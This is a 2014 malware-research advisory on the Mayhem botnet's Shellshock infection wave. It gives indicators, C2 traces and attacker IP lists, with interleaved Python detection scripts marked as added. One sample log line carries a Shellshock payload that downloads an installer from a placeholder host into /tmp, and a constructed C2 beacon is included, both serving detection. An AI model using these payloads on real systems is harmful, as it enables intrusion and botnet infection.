Tuesday, October 7, 2014

MMD-0029-2014 - Warning of Mayhem shellshock attack

Sticky Note: For the latest Mayhem infection incident (via weak WordPress login passwords), please see these links-->[LINK: 0day.jp/Japanese], [LINK and LINK: kernelmode/English] and [LINK VirusTotal Comment/English]

We were afraid this wave would come during the "shellshock" period, and it did. The attack wave of the "ELF .so malware library", the installer of the known botnet called "Mayhem", has just hit all of us. The attack comes from various IPs of their botnet against many *NIX services, using the Shellshock web-vulnerability scanning method to download a remote installer written in Perl (replacing the previous PHP-based infection). This is obviously a new and different infection vector for Mayhem, so we are calling it the Mayhem Shellshock version of the attack.
Thanks to @yinettesys (credit: link) for the quick alert and the attack-vector information; good work and a solid contribution to the community.

The attack

First detection:

2014-10-2 12:51:38 Zulu (UTC)

Payload attack first spotted:

2014-10-5 17:47:16 Zulu (UTC)

Pre-attack Shellshock Scanning PoC:

Payload installation attempt PoC (one-liner Shellshock)

Or as per this pastebin-->[here]

It shows multiple URLs for downloading the Perl installer of the Mayhem initial library (the Mayhem installer .so file) from a remote host; the file is saved in the /tmp directory, chmod'ed to 755 and then executed under the UNIX user privilege of your web server daemon.

Advised grep/detection string for spotting the attack:

"expr 1330 + 7"

The scheme:
The first scanner probes for Shellshock-vulnerable hosts/networks and sends two patterns of Shellshock query (see the first picture above). The botnet receives the scan responses and then sends the infection part of the Shellshock script (see the second picture above), the one with the wget that downloads the Perl installer script. The script is executed in /tmp, runs the ELF .so library and deletes it after execution, so no remote file needs to be accessed to trigger the infection (unlike the PHP installer version). The .so binaries are loaded into memory via LD_PRELOAD and stay resident to perform the further botnet operations.
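As an added example (not part of the original post), the scheme above can be turned into a log check: the probe carries the Shellshock function-definition prefix "() {" in a request header, the scanner stage uses the "expr 1330 + 7" string advised for grep, and the infection stage carries a downloader command pointing into /tmp. The script below classifies Apache combined-format log lines on that basis; the log lines, IPs and hostnames are constructed placeholders, not captured attack traffic.

```python
import re
from typing import Dict, List, Optional

# Constructed Apache "combined"-format log lines (not real attack logs).  Two of
# them carry the Shellshock marker "() {" in a header field: one is the scanner
# probe ("expr 1330 + 7"), one is a download attempt of the Perl installer
# into /tmp.  IPs and hostnames are placeholders.
SAMPLE_LOG = r'''
203.0.113.7 - - [05/Oct/2014:17:47:16 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; /bin/bash -c \"expr 1330 + 7\""
203.0.113.7 - - [05/Oct/2014:17:47:20 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :;}; /bin/bash -c \"wget http://installer-host.invalid/404.cgi -O /tmp/404.cgi\"" "Mozilla/5.0"
198.51.100.9 - - [05/Oct/2014:17:48:01 +0000] "GET /index.html HTTP/1.1" 200 3451 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''

# Apache combined log; referer and user-agent fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"'
)
SHELLSHOCK_MARKER = re.compile(r'\(\)\s*\{')           # the "() {" env-function prefix
SCANNER_MARKER = re.compile(r'expr\s+1330\s*\+\s*7')   # probe string the report advises to grep
DOWNLOADER = re.compile(r'\b(?:wget|curl)\b')          # infection stage fetches the installer
URL_RE = re.compile(r'https?://[^\s"\'\\;|&]+')


def classify_line(line: str) -> Optional[Dict]:
    """Return a finding for a log line that carries the Shellshock marker, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    hit_fields = {k: m.group(k) for k in ("req", "referer", "ua")
                  if SHELLSHOCK_MARKER.search(m.group(k))}
    if not hit_fields:
        return None
    payload = " ".join(hit_fields.values())
    if SCANNER_MARKER.search(payload):
        kind = "scanner-probe"
    elif DOWNLOADER.search(payload):
        kind = "installer-download"
    else:
        kind = "shellshock-other"
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "fields": sorted(hit_fields),        # which header(s) carried the payload
        "kind": kind,
        "urls": URL_RE.findall(payload),     # download hosts worth reporting/blocking
        "to_tmp": "/tmp/" in payload,        # installer dropped under /tmp, as in the report
    }


def scan_log(text: str) -> List[Dict]:
    return [r for r in (classify_line(l) for l in text.strip().splitlines()) if r]


def scanner_sources(text: str) -> List[str]:
    """Distinct source IPs that sent the Shellshock probe, for blocking or reporting."""
    return sorted({r["ip"] for r in scan_log(text) if r["kind"] == "scanner-probe"})


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The three fields are checked separately because the attacker controls every header that the CGI environment exports; matching only the User-Agent would miss the second sample line, where the payload sits in the Referer.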


The URL in the one-liner script leads to the Perl script that installs the Mayhem installer library:

The wget log shows that the host was still up and alive at the time this post was written:

The 404.cgi file is the Perl installer of the malware library; the neutralized code can be viewed below:

or in this pastebin-->[here]

This script has the same functionality as the previous PHP version; it is just a Perl version that carries the x32 and x64 ELF binaries as hex data, writes them into a file using the CGI permission on the targeted UNIX OS, and runs the matching library with LD_PRELOAD (as needed). FYI: the process started by this installer also runs with the UNIX privilege of your web server daemon.

To get the binaries, you need to patch that Perl script so it saves the hex-encoded binaries instead of running them; we scratched one together, feel free to use, modify or improve it: (click to copy & paste)

If you run it, you get the malware library files, which can be used for reporting or analysis:

Mayhem installer (ELF DYN ".so" LD_PRELOAD)

Below are the hashes and file types of the samples we collected in one incident:

$ md5 *.so
MD5 (sess32.so) = 'd5d4cb6dc0eaace5e31dfd32eaf63ae7'
MD5 (sess64.so) = 'd3d96ec99429ff70ab84f2a8cf21067f'

$ file *.so
sess32.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, corrupted section header size
sess64.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, corrupted section header size
We uploaded these samples to VT here--> [-1-] and [-2-]

Generally the ELF malware itself works like the previous version described in our post here [-3-] and in the research reported by the Yandex team here [-4-]. But we suspect there are changes in the "scanner/spider module" of the Mayhem component, which now uses Shellshock web queries/requests for its scanning or infection (this is not confirmed yet; we lack samples, and details will be added/updated).

In the binary dropped by the Perl installer (extract the binary first), or in the malicious .so files found on an infected machine, you can see these strings, which help to recognize it as the malware:

0x067BA     R,%d,%d,%d,%s,%s,
0x067CD     P,%u,%u,%u,%u,%u
0x067DF     "POST %s HTTP/1.0"
0x067F1     Host: %s
0x067FB     "Pragma: 1337" <================
0x06809     Content-Length: %d
0x06834     %s/%s
0x0688F     /dev/null <=== spawn..
0x06899     %s/%c.%d
0x068A5     (null)    <=== spawn
0x068B1     "LD_PRELOAD"  <=== preload
0x068BC     "/usr/bin/uname -a"  <=== grab info
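The extraction step described above (patching the installer so the hex-encoded binaries are saved rather than run) and the string check from this list can be combined in one triage helper. The following is an added example, not the post's own extraction script: it pulls every long hex string literal out of an installer-like Perl source, decodes it, checks the ELF magic and class byte, hashes it, and reports which of the listed indicator strings are present. The Perl layout (one hex string per Perl scalar) is an assumption, since the installer source is not shown here, and the two embedded blobs are constructed stand-ins that only carry an ELF identification header and a few of the strings; they are not loadable libraries and not the real samples.

```python
import hashlib
import os
import re
from typing import Dict, List, Optional

# Strings from the report's indicator list; finding them in a dumped .so is one
# quick way to recognise the Mayhem library.
INDICATOR_STRINGS = [
    b"Pragma: 1337", b"LD_PRELOAD", b"/usr/bin/uname -a", b"/dev/null",
    b"POST %s HTTP/1.0", b"R,%d,%d,%d,%s,%s,",
]


def _fake_blob(ei_class: int) -> bytes:
    """Constructed stand-in: a 16-byte ELF e_ident (magic + EI_CLASS) followed by
    padding and a few indicator strings.  Not a valid, loadable ELF object."""
    e_ident = b"\x7fELF" + bytes([ei_class, 1, 1, 0]) + b"\x00" * 8
    strings = [b"R,%d,%d,%d,%s,%s,", b"POST %s HTTP/1.0", b"Pragma: 1337",
               b"/dev/null", b"LD_PRELOAD", b"/usr/bin/uname -a"]
    return e_ident + b"\x00" * 32 + b"\x00".join(strings) + b"\x00"


# Assumed installer layout: one double-quoted hex string per architecture,
# assigned to a Perl scalar.  The variable names are placeholders.
PERL_INSTALLER_SAMPLE = (
    'my $sess32 = "' + _fake_blob(1).hex() + '";\n'
    'my $sess64 = "' + _fake_blob(2).hex() + '";\n'
    'my $dir = "/tmp";\n'
)

# A Perl scalar assigned a hex literal of at least 16 bytes (ELF e_ident size).
HEX_ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"((?:[0-9a-fA-F]{2}){16,})"')


def extract_hex_blobs(perl_src: str) -> Dict[str, bytes]:
    """Return {scalar_name: decoded bytes} for every long hex string literal."""
    return {name: bytes.fromhex(hexdata) for name, hexdata in HEX_ASSIGN_RE.findall(perl_src)}


def elf_class(blob: bytes) -> Optional[int]:
    """32, 64 or None, read from the ELF magic and the EI_CLASS byte (e_ident[4])."""
    if blob[:4] != b"\x7fELF":
        return None
    return {1: 32, 2: 64}.get(blob[4])


def indicators_found(blob: bytes) -> List[str]:
    return [s.decode() for s in INDICATOR_STRINGS if s in blob]


def triage(perl_src: str) -> Dict[str, dict]:
    """Per embedded blob: size, MD5 (as the report lists), ELF class, indicator hits."""
    report = {}
    for name, blob in extract_hex_blobs(perl_src).items():
        report[name] = {
            "size": len(blob),
            "md5": hashlib.md5(blob).hexdigest(),
            "elf_class": elf_class(blob),
            "indicators": indicators_found(blob),
        }
    return report


def dump_blobs(perl_src: str, outdir: str) -> List[str]:
    """Write each decoded blob to <outdir>/<name>.so for offline analysis; returns the paths."""
    paths = []
    for name, blob in extract_hex_blobs(perl_src).items():
        path = os.path.join(outdir, name + ".so")
        with open(path, "wb") as fh:
            fh.write(blob)
        paths.append(path)
    return paths


if __name__ == "__main__":
    for name, info in triage(PERL_INSTALLER_SAMPLE).items():
        print(name, info)
```

Because the page's own samples are reported with md5, the triage emits the same digest so a dumped file can be matched against the hashes above; the indicator check is a convenience for a first look, not a substitute for the `file` and VirusTotal steps the post describes.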

The binary self-decrypts, as protection against analysis/detection:

As in the previous version, during execution the malware drops a hidden file system containing the botnet's ELF component files, to be used for further malicious operations (we will look into this encryption later on), with the following filename/permission/attributes/size:

"-rw-r--r--  1 mmd mmd 12582912 Oct  7 06:58 .cahed_sess"
The samples also make callbacks to the remote server (CNC). In our recorded case, this is the communication:

CNC DNS query (raw):

uname({sysname="Linux", nodename="MY-", release="UNAME-IZ-", version="MMD-BANGS-YOU-", machine="AGAIN"}) = 0
connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("")}, 16) = 0
poll([{fd=4, events=POLLOUT}], 1, 0) = 1 ([{fd=4, revents=POLLOUT}])
sendto(4, "\3666\1\0\0\1\0\0\0\0\0\0\vdackjaniels\3net\0\0\1\0"..., 33, MSG_NOSIGNAL, NULL, 0) = 33
poll([{fd=4, events=POLLIN}], 1, 5000) = 1 ([{fd=4, revents=POLLIN}])
ioctl(4, FIONREAD, [49])    = 0
recvfrom(4, "\3666\201\200\0\1\0\1\0\0\0\0\vdackjaniels\3net\0\0\1\0"..., 1024, 0, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("")}, [16]) = 49
close(4)                    = 0
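The raw bytes strace printed in the sendto() line above are a complete DNS query, and the numbers in the trace can be checked against it. The parser below is an added example (not part of the original post): it decodes the 33-byte query from the escaped string exactly as strace shows it, and the header of the reply. strace only displays the first 32 bytes, so the final byte of the query is assumed here to be 0x01 (QCLASS IN); that assumption is consistent with the 33-byte length in the trace. It also shows why the reply was 49 bytes: one A record with a compressed name adds exactly 16 bytes to the question.

```python
import struct
from typing import Dict, Tuple

# Query bytes as printed by strace (32 shown), plus the assumed final byte
# 0x01 = QCLASS IN, which strace's 32-byte display cut off.
STRACE_QUERY = b"\3666\1\0\0\1\0\0\0\0\0\0\vdackjaniels\3net\0\0\1\0" + b"\1"
# Reply bytes as printed by strace (first 32 of 49); enough for the header.
STRACE_RESPONSE_HEAD = b"\3666\201\200\0\1\0\1\0\0\0\0\vdackjaniels\3net\0\0\1\0"


def parse_header(buf: bytes) -> Dict:
    """12-byte DNS header: ID, flags, and the four section counts."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", buf[:12])
    return {
        "id": txid,
        "flags": flags,
        "is_response": bool(flags & 0x8000),
        "recursion_desired": bool(flags & 0x0100),
        "rcode": flags & 0x000F,
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
    }


def parse_name(buf: bytes, off: int) -> Tuple[str, int]:
    """Decode a label sequence at off; handles compression pointers (RFC 1035 4.1.4)."""
    labels = []
    while True:
        n = buf[off]
        off += 1
        if n == 0:
            break
        if n & 0xC0 == 0xC0:                       # pointer to an earlier name
            ptr = ((n & 0x3F) << 8) | buf[off]
            off += 1
            tail, _ = parse_name(buf, ptr)
            labels.append(tail)
            break
        labels.append(buf[off:off + n].decode("ascii"))
        off += n
    return ".".join(labels), off


def parse_query(buf: bytes) -> Dict:
    """Header plus the single question section of a query."""
    info = parse_header(buf)
    name, off = parse_name(buf, 12)
    qtype, qclass = struct.unpack("!HH", buf[off:off + 4])
    info.update({"qname": name, "qtype": qtype, "qclass": qclass, "length": off + 4})
    return info


def expected_single_a_reply_length(query_len: int) -> int:
    """Reply = echoed question + one A RR: name pointer (2) + type (2) + class (2)
    + TTL (4) + RDLENGTH (2) + IPv4 address (4) = 16 bytes."""
    return query_len + 16


if __name__ == "__main__":
    print(parse_query(STRACE_QUERY))
    print(parse_header(STRACE_RESPONSE_HEAD))
```

Decoding the trace this way gives a defender a name to watch for (the QNAME the sample resolves) straight from an strace or ltrace session, without needing a packet capture of the sandbox.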

CNC sending and receiving communication:

connect(4, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("")}, 16) = 0
write(4, "POST /mayhem.php HTTP/1.0\r\nHost:"..., 177) = 177
read(4, "HTTP/1.1 200 OK\r\nServer: nginx/1"..., 32768) = 153
read(4, "", 32768)          = 0
close(4)                    = 0
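The strings listed earlier ("POST %s HTTP/1.0", "Host: %s", "Pragma: 1337", "Content-Length: %d") and the captured "POST /mayhem.php HTTP/1.0" line together describe the shape of this callback, which is enough for a simple network-side check. The code below is an added example, not from the post: it parses a raw HTTP request and flags the combination of a POST over HTTP/1.0 to a PHP path with the unusual `Pragma: 1337` header. The request bytes are constructed to that shape; the Host value and the body are invented placeholders.

```python
from typing import Dict, List, Tuple

# Constructed beacon modelled on the strings the report lists and the captured
# request line.  Host and body are placeholders, not values from the capture.
BEACON_SAMPLE = (
    b"POST /mayhem.php HTTP/1.0\r\n"
    b"Host: cnc.invalid\r\n"
    b"Pragma: 1337\r\n"
    b"Content-Length: 12\r\n"
    b"\r\n"
    b"R,1,2,3,a,b,"
)
# Ordinary browser-style request for comparison (also constructed).
BENIGN_SAMPLE = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.invalid\r\n"
    b"Pragma: no-cache\r\n"
    b"\r\n"
)


def parse_request(raw: bytes) -> Tuple[str, str, str, Dict[str, str], bytes]:
    """Split a raw HTTP request into method, path, version, headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, version, headers, body


def beacon_score(raw: bytes) -> Tuple[int, List[str]]:
    """Count the traits of the Mayhem callback present in a request."""
    method, path, version, headers, _ = parse_request(raw)
    reasons = []
    if headers.get("pragma") == "1337":
        reasons.append("Pragma: 1337 header")          # the distinctive marker
    if method == "POST" and version == "HTTP/1.0":
        reasons.append("POST over HTTP/1.0")           # matches "POST %s HTTP/1.0"
    if path.lower().endswith(".php"):
        reasons.append("PHP panel path")               # e.g. /mayhem.php
    return len(reasons), reasons


def is_mayhem_beacon(raw: bytes) -> bool:
    """Pragma: 1337 is decisive; require one corroborating trait to cut noise."""
    score, reasons = beacon_score(raw)
    return "Pragma: 1337 header" in reasons and score >= 2


if __name__ == "__main__":
    for sample in (BEACON_SAMPLE, BENIGN_SAMPLE):
        print(is_mayhem_beacon(sample), beacon_score(sample)[1])
```

The same three traits translate directly into an IDS content rule on outbound traffic to port 80, which is the practical way to spot already-infected web servers that the Shellshock log check above would not catch.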

In PCAP capture:

Attack vector report

The host that serves the Mayhem Perl script installer is located in France:

Reversed IP: 195-154-184-150.rev.poneytelecom.eu
ASN: 12876
Country: France
↑ This needs to be cleaned up ASAP.

In another case the same sample was recorded being distributed via the sendspace.com file-sharing service:

Below is the list of attacker IP addresses reported to match the Mayhem Shellshock attack pattern; thank you to the contributors @yinettesys, @0xAli, @belmonte, @xme

1. Summary of the Mayhem Shellshock scanner and attacker IP sources, compiled as per the statistics below:
(Data as of Sat Oct 11 23:52:50 JST 2014; format: Country, Count)

United States 25 <=== many attacks come from US networks
France         4
Turkey         3
Brazil         2
Canada         2
Netherlands    2
United Kingdom 2
Italy          1
Costa Rica     1
Argentina      1
Australia      1
Germany        1
Thailand       1
Kazakhstan     1
Ukraine        1
Poland         1
Indonesia      1
Sweden         1
Vietnam        1
New Zealand    1
Malaysia       1
Austria        1
Japan          1
------------------- +
Total         56 IP  of 23 countries
2. Mayhem Shellshock attacker IPs with geolocation details as of Sat Oct 11 23:52:50 JST 2014:
Format: IP Address, City, Region, Country Name (the IP address column is absent on this page; "-" marks an empty field)
Santa Rosa, CA, United States
Buffalo, NY, United States
Culver City, CA, United States
Overland Park, KS, United States
San Francisco, CA, United States
Seattle, WA, United States
South Bend, IN, United States
Secaucus, NJ, United States
Grand Island, NE, United States
Santa Rosa, CA, United States
Dallas, TX, United States
Provo, UT, United States
Scottsdale, AZ, United States
Kansas City, MO, United States
San Diego, CA, United States
Garden City, NY, United States
Ashburn, VA, United States
Elmhurst, IL, United States
Rio De Janeiro, 21, Brazil
-, -, Brazil
Amsterdam, 07, Netherlands
-, -, Netherlands
-, -, France
-, -, France
Celâl, 84, Turkey
-, -, Thailand
-, -, New Zealand
Chanh Hiep, 75, Vietnam
Montréal, QC, Canada
San José, 08, Costa Rica
-, -, Argentina
-, -, Malaysia
Kiev, 12, Ukraine
-, -, United Kingdom
-, -, Germany
Astana, 05, Kazakhstan
-, -, Italy
Jakarta, 04, Indonesia
-, -, Poland
-, -, United Kingdom
-, -, Austria
Spring Hill, 07, Australia
Stockholm, -, Sweden
San Antonio, TX, United States
Atlanta, GA, United States
San Antonio, TX, United States
San Antonio, TX, United States
Henderson, NC, United States
Istanbul, -, Turkey
Montréal, QC, Canada
Mountain View, CA, United States
Istanbul, -, Turkey
Provo, UT, United States
-, -, France
Tokyo, -, Japan
Roubaix, -, France
3. Mayhem Shellshock attacker IPs with network details as of Sat Oct 11 23:52:50 JST 2014:
Format: IP Address, Reverse Lookup, ASN, CIDR, Prefix, Country Code (2 letters), ISP Code, ISP Name (the IP address column is absent on this page; "-" marks an empty field)
emu.arvixe.com. | 36351 | - | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC
host.colocrossing.com. | 36352 | - | AS-COLOCROSSING | US | HUDSONVALLEYHOST.COM | HUDSON VALLEY HOST
thewineconsultant.com. | 31815 | - | MEDIATEMPLE | US | MEDIATEMPLE.NET | MEDIA TEMPLE INC.
cpanel.webindia.com. | 40913 | - | QTS-SJC-1 | US | SEALCONSULT.COM | IBIS INC.
- | 26228 | - | SERVEPATH | US | GOGRID.COM | GOGRID LLC
ec2-54-213-225-160.us-west-2.compute.amazonaws.com. | 16509 | - | AMAZON-02 | US | AMAZON.COM | AMAZON.COM INC.
202.smart-dns.net. | 12260 | - | COLOSTORE | US | COLOSTORE.COM | COLOSTORE.COM
- | 19318 | - | NJIIX-AS-1 | US | INTERSERVER.NET | INTERSERVER INC
webvms.kdsi.net. | 32101 | - | ASN-KLYS | US | KELLYSUPPLY.COM | KELLY SUPPLY COMPANY
starfish.arvixe.com. | 36351 | - | SOFTLAYER | US | ARVIXE.COM | ARVIXE LLC
s13.nzusatechgroup.com. | 36351 | - | SOFTLAYER | US | SOFTLAYER.COM | SOFTLAYER TECHNOLOGIES INC.
server.forkliftmarket.com.au. | 46606 | - | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER
ip-166-62-16-106.ip.secureserver.net. | 26496 | - | AS-26496-GO-DADDY-CO | US | GODADDY.COM | GODADDY.COM LLC
spanky.myserverplanet.com. | 23033 | - | WOW | US | MYVIRPUS.COM | DNSSLAVE.COM
- | 10439 | - | CARINET | US | PROENLACE.MX | CARI.NET
lazer.webair.com. | 27257 | - | WEBAIR-INTERNET | US | WEBAIR.COM | WEBAIR INTERNET DEVELOPMENT COMPANY INC.
ec2-75-101-129-180.compute-1.amazonaws.com. | 14618 | - | AMAZON-AES | US | AMAZON.COM | AMAZON.COM INC.
50-193-119-109-static.hfc.comcastbusiness.net. | 7922 | - | COMCAST-7922 | US | COMCASTBUSINESS.NET | PLANET PARTS
- | 262652 | - | R4C | BR | INTELIGNET.COM.BR | R4C SERVICOS DE INFORMATICA LTDA
forjastaurus.dominiotemporarioidc.com. | 19089 | - | DH&C | BR | UOL.COM.BR | UNIVERSO ONLINE S.A.
h35-91.net.ix-host.ru. | 50968 | - | HOSTMASTER | MD | IX-HOST.RU | HOSTMASTER LTD.
LLNH007.local. | 16265 | - | FIBERRING | NL | LEASEWEB.COM | LEASEWEB B.V.
ns3366463.ip-37-187-77.eu. | 16276 | - | OVH | FR | OVH.COM | OVH SAS
- | 16276 | - | OVH | FR | OVH.COM | OVH SAS
- | 8517 | - | ULAKNET | TR | - | CELAL BAYAR UNIVERSITESI
- | 56309 | - | SIAMDATA | TH | - | TAN SPIRIT CO. LTD.
- | 54113 | - | FASTLY | US | FASTLY.COM | FASTLY INC
sv20.quangtrungdc.name.vn. | 24085 | - | QTSC-AS | VN | - | IP RANGE ALLOCATE FOR QTSC'S INTERNET DATA CENTER
- | 32613 | - | IWEB-AS | CA | IWEB.COM | IWEB TECHNOLOGIES INC.
caam-190-10-14-a037.racsa.co.cr. | 3790 | - | RADIOGRAFICA | CR | RACSA.CO.CR | SERVICIO CO-LOCATION RACSA
server.cubomagico.tv. | 52270 | - | X | AR | IFXNW.COM.AR | NXNET
- | 24218 | - | GTC-MY-PIP | MY | GLOBALTRANSIT.NET | GTC MY PIP NET
pedlarly-tack.volia.net. | 25229 | - | VOLIA | UA | VOLIA.NET | KYIVSKI TELEKOMUNIKATSIYNI MEREZHI LLC
- | 13213 | - | UK2NET | GB | UK2.NET | UK2 - LTD
s16296639.onlinehome-server.info. | 8560 | - | ONEANDONE | DE | 1AND1.CO.UK | 1&1 INTERNET AG
- | 9198 | - | KAZTELECOM | KZ | - | ENU
alodrink.eu. | 31034 | - | ARUBA | IT | ARUBA.IT | ARUBA S.P.A.
web2.jabikha.net. | 23950 | - | GENID-AS | ID | JABIKHA.NET | PT JARINGAN BISNIS KHATULISTIWA
host50-89-206-41.limes.com.pl. | 29649 | - | LIMES | PL | LIMES.COM.PL | LIMES S.C.
futureis-3.titaninternet.co.uk. | 20860 | - | IOMART | GB | TITANINTERNET.CO.UK | TITAN INTERNET LTD
d91-130-113-149.cust.tele2.at. | 1257 | - | TELE2,S | EU | TELE2.AT | TELE2 TELECOMMUNICATION SERVICES GMBH
110-44-30-204.host.neural.net.au. | 45844 | - | NEURALNETWORKS-AS | AU | NEURAL.NET.AU | NEURAL NETWORKS DATA SERVERS PTY. LTD.
static-83-168-199-4.cust.crystone.se. | 35041 | - | NET-CRYSTONE | SE | CRYSTONE.SE | CRYSTONE AB
184-106-196-169.static.cloud-ips.com. | 19994 | - | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING
- | 32780 | - | HOSTINGSERVICES-INC | US | MIDPHASE.COM | HOSTING SERVICES INC.
184-106-196-169.static.cloud-ips.com. | 19994 | - | RACKSPACE | US | RACKSPACE.COM | RACKSPACE HOSTING
67-23-9-241.static.cloud-ips.com. | 33070 | - | RMH-14 | US | RACKSPACE.COM | RACKSPACE CLOUD SERVERS
lamp2.ncol.net. | 11426 | - | SCRR-11426 | US | NCOL.NET | NCOL.NET INC.
host-82-222-172-99.reverse.superonline.net. | 34984 | - | TELLCOM | TR | SUPERONLINE.NET | TELLCOM ILETISIM HIZMETLERI A.S.
- | 32613 | - | IWEB-AS | CA | - | POLLOCK NEAL
- | 15169 | - | GOOGLE | US | GOOGLE.COM | GOOGLE INC.
linux.zenpozitif.net. | 9121 | - | TTNET | TR | SUNUCU.COM.TR | NETFACTOR
142-4-11-48.unifiedlayer.com. | 46606 | - | UNIFIEDLAYER-AS-1 | US | UNIFIEDLAYER.COM | UNIFIED LAYER
- | 16276 | - | OVH | FR | OVH.COM | OVH SAS
kokuralab.com. | 7684 | - | SAKURA | JP | SAKURA.AD.JP | SAKURA INTERNET INC.
tx.irontec.com. | 16276 | - | OVH | FR | OVH.COM | OVH SAS
For a GeoIP graphical view, please click the image below (thanks to JC for the GIPC!):

Thank you @xme (twitter) for Google-mapping all the IP sources in more comprehensive detail, see the link below↓

These attacker IPs are a combination of (known) Mayhem bots we monitor and unknown sources (including the suspected possibility of new panels/CNC/bots). We ask the related ISPs to check their hosts in detail if their IP is listed above. Cleaning up the botnet nodes will reduce the infection speed, so please kindly cooperate.

Sysadmins and ISPs: please BLOCK the IP addresses listed in this report. A proven, wide-ranging targeted attack is ongoing from those IPs; we checked in countries such as Japan, Australia and Malaysia. Below is another snippet of a different attack coming from the listed IP addresses:

Thanks to @0xAli for this additional information

Since some requests came in: you may ask us for the attack log for the purpose of cleaning your network from the Mayhem botnet by leaving a comment at the bottom of this post; please include an email address so we can contact you. The comment will not be published, feel free to test it beforehand.

More messages and additional information

This is a warning, written to be sent to various CERT contacts as a reference. The threat has not been neutralized yet and is still actively infecting us (it has only just started, more like it). We decided to hurry in raising this alert for threat awareness. The material will be extended with updates and new analysis, so please check back for updates too.

The samples are shared for research purposes via kernelmode, access here -->(LINK)

If the Mayhem botnet uses Shellshock, this is a very serious threat; please work and cooperate together in good coordination in order to stop the source of the threat.

(reserved) We will add further information here (/reserved)

References for previous infection reports of Mayhem
(ELF .so LD_PRELOAD malware)

1. MMD-0020-2014 - Analysis of infection ELF malware: libworker.so -->LINK
2. Video tutorial to dissect ELF .so malware that's using LD_PRELOAD -->LINK
3. MMD-0024-2014 - Recent Incident Report of ELF (LD_PRELOAD) libworker.so -->LINK
4. Repository of Linux/Mayhem threat in KernelMode.info -->LINK
5. Report by Yandex team, via Virus Bulletin -->LINK
6. Report by DamageLab.org -->LINK
7. Report by Artturi Lehtio via F-Secure blog -->LINK

Thank you for helping to raise awareness and for the mentions

We thank our friends in the IT news media for helping to raise awareness and for kindly linking to and mentioning our research.

1. Virus Bulletin
2. e-Week IT News
3. Threat Post
4. Security Affairs
5. PC World - Web sites, Business Security, Linux
6. Government Info Security
7. Softpedia - Server related security news
8. US Homeland Security - Daily Open Source Infrastructure Report [PDF]
9. Info Security Magazine
10. CERT Hungary Alert (Hungarian)
11. Kaldata (Bulgaria) Security News
12. SecurityLab (Russia)
13. NovostIT (Russia)
14. HagDig
15. IndusFace
16. Akamai Blog: Five Good Security Articles
17. Security Week
18. ITHome (Taiwan)
and many more; Google search keywords: "mayhem shellshock malwaremustdie"